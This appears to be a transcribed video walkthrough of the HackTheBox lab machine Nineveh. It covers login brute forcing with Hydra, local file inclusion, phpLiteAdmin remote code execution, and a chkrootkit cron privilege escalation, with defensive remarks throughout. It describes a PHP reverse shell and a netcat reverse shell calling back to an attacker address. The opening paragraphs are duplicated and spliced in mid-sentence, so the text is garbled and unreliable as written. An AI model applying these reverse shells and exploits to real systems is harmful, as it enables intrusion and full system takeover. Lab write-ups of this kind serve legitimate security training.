Welcome to this walkthrough of Nineveh on HackTheBox. This is box number 8 in our series of 10 HackTheBox machines exploited without the use of Metasploit. We'll start off, as usual, by running auto recon, and we'll let that run to its conclusion. You can pause the video here, and we'll return when all the results are in. All right, we have probably just 2 results. So looking through the Nmap results, we can see that we have a response on port 80, an Apache web server, and on port 443, another Apache web server. Neither site appears to have a title of any kind. We do get to see that this is for ostensibly the Nineveh.htb domain. We do get open ports returned on the UDP scan, but they're all noted as filtered, so they're not accessible to us at present. Looking first at our HTTP site on port 80, we can see a generic default web page. It works. Our basic GoBuster results for the HTTP site found info.php exposed, which exposes the presence of PHP and its version and the server operating system version and so on. As with our /dev folder in the previous box, info.php is so common and potentially damaging that Nikto and Nmap also scan for it. And this page should be removed from any production system. Now, I've come to appreciate the OSCP motto, try harder, is a bit of a misnomer. It really should be enumerate harder. So we won't settle for the basic directory enumeration results. A deeper manual GoBuster run is in order here. Now this will take significantly longer, but we will get more results out of this. So I'm going to run this now. You can pause, run it yourself, and we'll return when those results are back. And I'm actually going to pause it here. We've got the one result that will return out of that search. And that is the /department page. Which brings us to a login form for the Nineveh department. If we have a look at the source code, we can see, again, a fairly simple login page. And we have in here a comment. Just by using the web inspector, we can see that it contains comments that aren't revealed on the website itself. So in this case, welcome to this walkthrough of Nineveh on HackTheBox. This is box number 8 in our series of 10 HackTheBox machines exploited without the use of Metasploit. We'll start off, as usual, by running auto recon, and we'll let that run to its conclusion. You can pause the video here, and we'll return when all the results are in. All right, we have probably just 2 results. So looking through the Nmap results, we can see that we have a response on port 80, an Apache web server, and on port 443, another Apache web server. Neither site appears to have a title of any kind. We do get to see that this is for ostensibly the Nineveh.htb domain. We do get open ports returned on the UDP scan, but they're all noted as filtered, so they're not accessible to us at present. Looking first at our HTTP site on port 80, We can see a generic default web page. It works. Our basic GoBuster results for the HTTP site found info.php exposed. Which exposes the presence of PHP and its version and the server operating system version and so on. As with our /dev folder in the previous box, info.php is so common and potentially damaging that Nikto and Nmap also scan for it. And this page should be removed from any production system. Now, I've come to appreciate the OSCP motto, try harder, is a bit of a misnomer. It really should be enumerate harder. So we won't settle for the basic directory enumeration results. A deeper manual GoBuster run is in order here. Now this will take significantly longer, but we will get more results out of this. So I'm going to run this now. You can pause, run it yourself, and we'll return when those results are back. And I'm actually going to pause it here. We've got the one result that will return out of that search, and that is the /department page. Which brings us to a login form for the Nineveh department. If we have a look at the source code, we can see, again, a fairly simple login page, and we have in here a comment. Just by using the web inspector, we can see that it contains comments that aren't revealed on the website itself. So in this case, a message to the admin that MySQL's been installed, asking them to please fix a login page from a user named Amwa. And that slip-up gives us two potential usernames then, admin and Amwa. So this is a bad habit of programmers, leaving notes for themselves and other team members in the code base. It's not always as damaging as exposing test credentials, but each of these pieces of information adds up. We don't want to give the attacker anything to work with, no matter how inane or benign it might seem in isolation. And we can test our login form using a couple of test credentials to see if admin or Amwa are valid users on this site. So if we start by providing the username test and no password, we get the response invalid username. If, however, we provide the username admin and no password, we get the response invalid password. So now we have a mechanism for enumerating possible usernames. Now this is a common enough vulnerability, but an important one, especially on this login form that allows unlimited attempts to log in using any password. There should only ever be a single generic response for incorrect credentials, something like incorrect username and or password, which doesn't reveal which part of that authentication pair is incorrect. There should also be a limit on the number of attempts we can make unsuccessfully before the account is locked out. So with this knowledge in hand, we can see if the admin password is guessable using Hydra. So our format here is calling the Hydra command, lowercase tac-l. We'll provide it with a username. If we use uppercase tac-l, we could provide it with a file full of usernames, but we know that admin is a valid username. We're going to provide it with uppercase tac-p and provide it a password list. In this case, we're using the one from seclists in the common credentials folder of passwords. This is the top 10,000 passwords out of a 10 million password list. We could use lowercase p if we suspected we knew a password, but we're testing it against a series of, well, or one or a series of users. We're going to pass that to 10.10.10.43, our website. we are making an HTTP post request of a form, and that form is the /department/login.php, which we can see in our source code. And if we captured the request in burp, we would see it's a post request. The format for that request then is to provide it in the body the username equals, the format here is *user in uppercase, and password equals *pass in uppercase. So that's going to tell the Hydra where to insert admin and our password list of passwords. And we'll also provide it with a fail condition. That is, if it sees invalid password exclamation mark. And so we can see that we're clearly not being locked out. It's running through hundreds of passwords already. And in a very short order, less than 400 passwords, we have found the login admin password 1Q, 2W, etc., etc. So that's a very weak password, and it shows up in all sorts of common password dictionaries. And that means that we can log in now using the username password and that password, which is simply back and forth across the top two rows of the keyboard. And that brings us to a management page of some sort under construction. It's a simple enough page, just a home area, a logout button, and a notes area, which is probably where those developer comments could have gone and should have gone if the authentication had been more secure. In the notes area currently, though, we have information about hard-coded credentials, about a secret folder, and about an interface with a database. The URL should also give us a moment of pause, as we see direct reference to what looks like a file path, files/ninevehnotes.txt. So we should test our ability to modify this path for path traversal and local file inclusion. Now, most of my early attempts at path traversal got nowhere. We get the response, no note selected. Trying to work our way back up through the file structure and then down into etc password. Again, no note selected. Direct reference to etc password also fails. So these all result in this no note is selected message. But when I returned the file path to its original path, ninevehnotes.txt, or thought I was returning to its original path and accidentally added a slash at the beginning, we get a warning. So the include /files/ninevehnotes.txt failed to open a stream, no such file or directory in /var/www/html/department/manage.php. So chances are we do have some route here to access files on this server. The question is, how is it being filtered? And so with a little more experimentation, we find that we get the same warning message from /ninevehnotes.txt and /ninevehnotes without the extension, but not without the S. So it seems that we need the string Nineveh notes in the file path in order for it to work. Now this is a bit silly. I only stumbled on it by accident, but that's really what fuzzing is all about, I guess. If I had changed it to ninevehnotes.php, which would probably have been my next guess, to test its response to PHP files in general, since we know that we have PHP running on this system, we might have noted the warnings that way too. But we'll have a look at the back-end code eventually. And frankly, if they were concerned enough about protecting the file path with this odd filter, you'd think they'd be concerned enough to limit it in other more reliable ways too. But this is occasionally the way things work, as people are trying to program in security without knowing how that security works. In any case, we need to see if we can use this now to traverse the file structure on the server and access other files. So digging down into the file structure, we'll have a look at etc password. And sure enough, in our notes, we get the output of the etc password file. Now, unfortunately for us, the same trick does not work with the home folder of the user amwa, who is presumably our user.txt holder. Not to say that the file is not there, but simply that permission is denied. So let's leave this for now and have a look at the HTTPS web results, since we also have a web service running on HTTPS. And right off the bat, we get a security risk warning, because the server is offering up a self-signed and expired certificate. We can view the certificate, which gives us some more standard information about the domain, Nineveh.htb, as well as information about the issuer and a potential email address, admin@nineveh.htb. Accept it for now. And it appears that the root site is just an image. Nineveh is the name of the box. It's the ancient Assyrian city, now ruins outside Mosul in Iraq. And our image has some presumably Iraqi soldiers celebrating with Iraq flags. Well, we all like a good flag, don't we? Now, looking back at our GoBuster results, our HTTPS results, we can see a redirect on /db, which is interesting and common and repeatedly vulnerable enough for things like Nikto to look for it as well. Going to that page, we can see that we've got a PHP Lite admin version 1.9 login page. Now we can look for default credentials for the PHP Lite admin application. And find that there is a default password admin. But that appears to have been changed on this server. Bravo for that, at least. My next thought was to try a bit of SQL injection fuzzing, using the seclist generic SQL injection entries as we'd done in the past. But it takes time, and it ended up giving no useful results. No useful results except that I got bored while it was running and decided to try a few common passwords just to kill the time. And that did work. After trying password, and password with an uppercase P, neither of which worked, I moved on to password 1 and uppercase P password 1, and eventually 5 guesses in, password 123. Now, just as we saw with the Nineveh department login, the attempts aren't being limited, and the password is terribly common in password dictionary lists. If it hadn't succumbed to simple manual guessing, we could have used Hydra again with the same top 10,000 word list and gotten the password in seconds. So the solution is simple here. Change the password to a long, complex password or passphrase. Plain and simple. Now, a quick Google will tell us that there is a remote code execution vulnerability on versions of PHP Lite admin before 1.9.4, so 1.9.3 and earlier. And we can follow, not complex code this time, but a simple set of steps outlined in that exploit as follows. Number one, create a new database, which you can do right here, and give it a PHP extension. We can call ours hack.php. We'll select our database, and we'll create a new table in that database. We can call it hack. Tell it it's going to need to give us just one field. We can call that field hack. Make it a text field. And provide a default value that is some PHP code. Now for a proof of concept, we'll simply have it do the PHP info page. Hit create. It's been created. And if we return to our database, we can also see the absolute path to our database on this server, /var/temp/hack.php, which is very convenient for us as we have a way of reaching out to files whose paths we know through our local file inclusion vulnerability in the Nineveh department site. So returning to that site, logging in as admin, and opening our notes area, we can change our file path to include Nineveh notes in it so that it passes the filter, and direct it at var temp hack.php. And what we get as a result at the bottom here, instead of a standard note, is a bit of information out of the database itself, and then our PHP info. So we know that we can execute code. We already have the PHP info for this server. That's not what we're out to get. But we can modify our proof of concept code to create a PHP reverse shell in that default field entry for our database. I'm just going to create a new database, call it exploit.php. Select that database, create a new table with one field. Name that field anything we want, make it a text field, and in our default value, we're going to put, I'll put it down in here, this is our PHP code. So it's going to create a socket, or rather open a socket, back to the attack machine, 10.10.14.17 on port 9999, and it's going to open bin bash in the interactive method. So our next stop, before we go too much farther, will be to open a listener on that port 9999, finish creating our table, return to our Nineveh department page, and use our path traversal to run the exploit.php database. And we get a connection right away. So we have a shell, and if we run this shell, we can see that we're running as www-data, the service running the web page as expected, which apparently didn't have access to the AMWA user. Now, it's not a great shell. For instance, even if we knew AMWA's password, we can't switch users into it. SU must be run from a terminal. But we can try to upgrade our shell just a bit with a simple Python command. We get an error returned on that, but that's not a problem. It just means that we need to try again using Python 3 instead of Python 2. We follow that up with stty raw-echo, and now, while we don't know Amwaz's password, at least we have the option to try it out. All right, so this upgraded shell will at least let us try to switch users later if we need to, and generally be better for us. Running pwd, we can see that we are in the var www html department folder, which contains the department website code, including manage.pht. Where we can see that filter that it requires Nineveh notes string to be in the file path. Again, it's a bit weird that they would know enough to protect their file inclusion, but not enough to do it properly. But the internet is a strange place. We can also see a length restriction that didn't really bother us and never came into play. This folder also contains the login.php code. And here, up in the PHP code section of it, we can see those hard-coded credentials that the note mentioned. These should be in some separate file, or better yet, authentication should be done against credentials on the server or a proper authentication service like Active Directory. If we were to look around the server a bit more, we still don't have access to the Amwa home folder and its contents. We're permission denied when we try to read user.txt. But right down at the root directory, we can see an interesting folder, an unusual folder called report that also belongs to the Amwa user. In this folder, we can see a report. And if we were to wait a little while and view the contents again, a little longer than that in any case, we would see a growing collection of minute-by-minute reports. So there is likely a cron scheduled task running here. There we go. A second one there. We can have a look at one of these reports. And see that it is checking for rootkits. In fact, it may even have found one on the sbin init file. If we were to Google for that, and this sort of error message, or this message rather, in the checks, we find that we're looking at the output of check rootkit. And since it's running as a cron job, it's worth looking into a bit more closely. And we can see that there is an opportunity here for local privilege escalation. Again, not a long, complicated series of code. In fact, this is just pointing out the section of checkroot that is vulnerable, we have a really quite simple exploit. So it tells us that the line file port equals $file port $i will execute all the files specified in the $slapper files as the user that check rootkit is running, usually root. If $file port is empty, because of some missing quotation marks around the variable assignment, then it's going to run this. So we can put an executable file named update with any non-root owner in the /temp folder and run check rootkit, preferably as UID 0 as root. And the result is that the file /temp/update will be executed as root, effectively rooting the box. So let's see who check root is owned by. And we can see that it's owned by root. So if we follow the exploit path and we create an executable file called update in the temp folder, it should execute as root. We can see that we have netcat available to us on this machine. So if we move into the temp directory and try a simple netcat connection for our exploit code, this will just put the text nc 10.10.14.17 9990 and execute bin.sh into a file called update. We make that file executable. Open a new listener, this time on 9990, and simply wait for check rootkit to run sometime in the next minute. It does nothing. And that's okay. There is more than one way to create a reverse shell, and plenty of different ways out there if you just Google reverse shells or netcat reverse shells. In this case, a different netcat shell command works just fine. Rather than running netcat all on its own, this is a series of piped commands through running bin.sh in the interactive mode through an intermediary F file in the temporary directory. So in less than a minute, we ought to get a shell. And we do. So now we got our second shell, and running who am I? We can see that we're running as root. So that lets us view both files, both the home amwa user.txt file and the root.txt file. So a lot of little pieces come together on this machine to produce a complete takeover of the system. Weak passwords and unlimited authentication attempts let us brute force our way in using usernames we found in comments and tested for validity against the different messages the logon form returned for failures. The department page allowed path traversal, even with the half-hearted attempt to limit it, and our database manager version allowed us to create a database with a PHP extension. Put those together, and we have a low privilege shell. Once in, we have the check rootkit cron job running every minute as root, and the ability to have it run code for us just by adding a file to the /temp directory, which is typically open to even the lowest privilege accounts. If cron really did need to run check rootkit every minute of the day, this issue could be prevented by configuring the cron job to run at a lower privilege, or configuring the check rootkit binaries file port variable to look for a specific protected file, and so on. It's worth noting, too, that we didn't actually get access as a regular user, as amwa. So here's a little bonus access that we can find once we have our initial shell. If we enumerate harder on the HTTPS site using GoBuster, so attacking our HTTPS version 10.10.10.43 with the big directory list in sec lists, we do need the -K to ignore the expired certificate. After some time and patience, we would find the directory /secure_notes, which is presumably the secret folder that we were hearing so much about in the notes area. So if we go there, we get an image of ancient Nineveh, but not just any image of Nineveh. If we download this, save the image locally, and run it through my pet steganography munching tool, the T-Rex, which you can find on my GitHub repo. And which I have on my local machine. We can run that through the T-Rex, and it will collect a variety of information, doing some basic steganography checks. It's having a couple of errors, but that's all right. We'll still get output. And if we have a look at the report, we see that there's additional data after the IEND chunk, presumably the source of some of our errors. And if we have a look in the results folder here, we can see that trailing data, which, yet again, is a pair of, well, in this case, a pair of private and public RSA keys, which we can copy out to separate files, set our 600 permissions on those, and use them for SSH. Now, we know we didn't see port 22 show up in the Nmap results, and we don't have any IPv6 addresses to try this time. But there's one, or at least one other way, we might find an SSH port to connect to, and that's through port knocking. So to see if that's a viable option, we can have a look for the file etc knockd.conf. And we do have one here. We can get access to that even with our low-level shell. And what it shows us is that we're able to open SSH by sending requests to the sequence of ports, 571, then 290, then 911, within a period of 5 seconds. So port knocking relies on a series of TCP ports being connected to, being knocked on within a specific time frame, in order to alter the firewall rule to open a port, another port. In this case, our knock configuration file shows us an OpenSSH rule, which will update the IP tables firewall with an accept rule for port 22 as the destination from any source address. And in order to trigger that rule, we need to connect, as I said, to ports 571, then 290, then 911 within 5 seconds. Now, using my fish terminal, we can do this with a simple for loop. It uses nmap to knock on each of those ports. So we can see for each of the ports in this series 571, 290, 911, and it'll do 22 as well, just to show us our results that it is in fact open now. It'll run an nmap request with no retries, just pinging these ports, or just connecting to these ports rather, on 10.10.10.43. And so at the end of that, we see that port 22 is now open. The bash version, which may be more familiar to you, is very similar. Again, for port in the series that we've got, do nmap. So we're just adding the do command before nmap. And we'll finish it up with done instead of end. Just some basic shell format. And that opens up port 22, where we can use our stolen RSA private key. So using SSH, connecting using a key for the user amwa at 10.10.10.43. And we're logged in. And if we run whoami, we can see that we're logged in as amwa. And with that user level access, we could follow the same privilege escalation route as we did previously from the low-level www data shell. The port knocking method can actually be quite good. It hides the SSH port from any attempts to connect to it unless you know or suspect that port knocking is in place, and you can guess the ports to knock. Now, if that's a lot of ports, then this can be very strong indeed. Each additional port increases the key space by a factor of 65,535, the number of possible TCP ports. But with just 3 here, it could have been brute forced quite easily. That said, all of that just opens the SSH port, which does us no good if we don't have credentials or usernames and guessable passwords, or as we have here, RSA keys. And hiding the keys at the end of an image file is bad news. There are more sophisticated and secure password-protected steganography methods that would have put up more resistance, but storing RSA keys insecurely is never going to end well, as we've seen twice now.